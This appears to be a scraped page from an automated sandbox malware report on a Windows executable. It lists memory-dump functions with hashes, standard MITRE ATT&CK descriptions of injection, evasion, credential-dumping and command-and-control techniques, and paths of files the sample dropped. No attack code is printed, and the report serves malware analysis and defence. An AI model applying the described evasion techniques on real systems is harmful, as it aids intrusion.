Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: aef26f0ca7a06b46ad553bd4a68fb9caa76fea055764a3bd941c0da5e01fbdea
Instruction ID: 0f59d67af41fb724f804b49f51804f2aef94ddee73300514e5d4731b0669a319
Opcode Fuzzy Hash: aef26f0ca7a06b46ad553bd4a68fb9caa76fea055764a3bd941c0da5e01fbdea
Instruction Fuzzy Hash: 742153B6E00219ABDB10DFA9CC44AEEB7E8AF44644F080596E955E7240E730EA018BA1

Function 037DF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0382031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038202E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038202BD

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 92748f7085df33e337fa9b30c94b42120c0bedc18d6a2fa21c5748b3ea925444
Instruction ID: 03692c7af9cc93a618668a4462f52d8359150995a57b5a1d2c765a7023dbf332
Opcode Fuzzy Hash: 92748f7085df33e337fa9b30c94b42120c0bedc18d6a2fa21c5748b3ea925444
Instruction Fuzzy Hash: C1E19C706087419FD725CF68C884B6ABBF0BF85324F180A9DE5A6CB2E1D774D885CB42

Function 037EBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 03827BAC
RTL: Resource at %p, xrefs: 03827B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03827B7F

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: ae5c69543fa489b26a0e8e2cd9ee47f3297895cd6e22e54d642a44d19fb2c524
Instruction ID: aa3a58917934568d0ce940b93c92bab9be41a061c271c11a504ab750ed24c949
Opcode Fuzzy Hash: ae5c69543fa489b26a0e8e2cd9ee47f3297895cd6e22e54d642a44d19fb2c524
Instruction Fuzzy Hash: AE4111357087029FDB24CE69C840B2BBBE5EF89710F140A6DF95ADB781DB30E8458B91

Function 037EB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0382728C

Strings

RTL: Re-Waiting, xrefs: 038272C1
RTL: Resource at %p, xrefs: 038272A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03827294

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 9a1f2ce2976c9b12694888b89367304dab0a173bf5533f4858df7d6522a0731a
Instruction ID: aca4cbccb7f3f2e359b37a8e1367fbe2a0f0378e001358a290473b22521e2b4b
Opcode Fuzzy Hash: 9a1f2ce2976c9b12694888b89367304dab0a173bf5533f4858df7d6522a0731a
Instruction Fuzzy Hash: D8410F36604316ABDB20CEA5CC41B6ABBA5FF89710F140659F956EB281DB20F892C7D1

Function 03862300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0386238D
___swprintf_l.LIBCMT ref: 038623B3

Strings

]:%u, xrefs: 038623AA
%%%u, xrefs: 03862384

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 917a6684b8cd06486e548fbb74ecae14074e0e9ef648bf1e625be07e9a70bcda
Instruction ID: e87f0537cb173649e08c25f9777f5b023188fd279bf6879eceb86357d9397284
Opcode Fuzzy Hash: 917a6684b8cd06486e548fbb74ecae14074e0e9ef648bf1e625be07e9a70bcda
Instruction Fuzzy Hash: CA319876A006199FDB20DF6DDD40BEEB7F8FF84610F4405D6E849E7240EB309A448BA1

Function 037F7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 037F7E8B

Strings

+, xrefs: 037F7DE8
-, xrefs: 037F7DDD

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: 8cde3073795aae48a682ed41e6fc613e721dd2485a022f090f3aca323ad41ab3
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: EE91B470E0025ADFDB28DF69C881ABEB7E5FF443A0F58461AEA65E73C0D73099428751

Function 037B9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 037B9191
@, xrefs: 037B9175

Memory Dump Source

Source File: 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 0000000B.00000002.4108652203.00000000038A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.00000000038AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3780000_nslookup.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 318ff7ec43dfb185a688ea4b3f0fc57261d23cfe0b36f1ced15ee10f1c193491
Instruction ID: 057375ced4fb6087a214ce419655c9fb36a8f8f6e62002aef137f98ea7b2a596
Opcode Fuzzy Hash: 318ff7ec43dfb185a688ea4b3f0fc57261d23cfe0b36f1ced15ee10f1c193491
Instruction Fuzzy Hash: B3812C75D002699BDB31DB94CC45BEEB7B8AF49710F0445EAEA19B7280E7305E84DFA0

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report A4mmSHCUi2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\A4mmSHCUi2.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\030c0fG

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfw153pf.q5j.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pa0h0x4p.51m.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3ik5t5z.gk5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wyzz4iki.3te.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
A4mmSHCUi2.exe

Function 073746E8 Relevance: 6.9, Strings: 5, Instructions: 622
COMMON

Function 07627AA5 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Function 07627AB0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 028CAED7 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre